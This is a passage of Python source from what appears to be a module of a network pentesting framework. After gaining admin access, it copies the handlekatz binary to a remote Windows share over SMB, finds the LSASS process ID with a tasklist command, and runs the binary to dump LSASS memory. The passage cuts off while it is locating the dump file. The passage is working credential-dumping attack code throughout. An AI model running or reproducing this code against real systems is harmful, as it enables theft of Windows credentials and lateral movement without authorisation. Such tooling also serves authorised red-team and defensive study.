(self, context, connection)
| 51 | self.dir_result = module_options["DIR_RESULT"] |
| 52 | |
| 53 | def on_admin_login(self, context, connection): |
| 54 | handlekatz_loc = self.handlekatz_path + self.handlekatz |
| 55 | |
| 56 | if self.useembeded: |
| 57 | try: |
| 58 | with open(handlekatz_loc, "wb") as handlekatz: |
| 59 | handlekatz.write(self.handlekatz_embeded) |
| 60 | except FileNotFoundError: |
| 61 | context.log.fail(f"Handlekatz file specified '{handlekatz_loc}' does not exist!") |
| 62 | sys.exit(1) |
| 63 | |
| 64 | context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}") |
| 65 | |
| 66 | with open(handlekatz_loc, "rb") as handlekatz: |
| 67 | try: |
| 68 | connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read) |
| 69 | context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}") |
| 70 | except Exception as e: |
| 71 | context.log.fail(f"Error writing file to share {self.share}: {e}") |
| 72 | |
| 73 | # get LSASS PID via `tasklist` |
| 74 | command = 'tasklist /v /fo csv | findstr /i "lsass"' |
| 75 | context.log.display(f"Getting lsass PID via command {command}") |
| 76 | p = connection.execute(command, True) |
| 77 | context.log.debug(f"Command Result: {p}") |
| 78 | if len(p) == 1: |
| 79 | p = p[0] |
| 80 | |
| 81 | if not p or p == "None": |
| 82 | context.log.fail("Failed to execute command to get LSASS PID") |
| 83 | self.delete_handlekatz_binary(connection, context) |
| 84 | return |
| 85 | # we get a CSV string back from `tasklist`, so we grab the PID from it |
| 86 | pid = p.split(",")[1][1:-1] |
| 87 | context.log.debug(f"pid: {pid}") |
| 88 | |
| 89 | command = self.tmp_dir + self.handlekatz + " --pid:" + pid + " --outfile:" + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log" |
| 90 | context.log.display(f"Executing command {command}") |
| 91 | |
| 92 | p = connection.execute(command, True) |
| 93 | context.log.debug(f"Command result: {p}") |
| 94 | |
| 95 | if "Lsass dump is complete" in p: |
| 96 | context.log.success("Process lsass.exe was successfully dumped") |
| 97 | dump = True |
| 98 | else: |
| 99 | context.log.fail("Process lsass.exe error un dump, try with verbose") |
| 100 | dump = False |
| 101 | |
| 102 | if not dump: |
| 103 | self.delete_handlekatz_binary(connection, context) |
| 104 | return |
| 105 | else: |
| 106 | regex = r"([A-Za-z0-9-]*\.log)" |
| 107 | matches = re.search(regex, str(p), re.MULTILINE) |
| 108 | if not matches: |
| 109 | context.log.display("Error getting the lsass.dmp file name") |
| 110 | return |
nothing calls this directly
no test coverage detected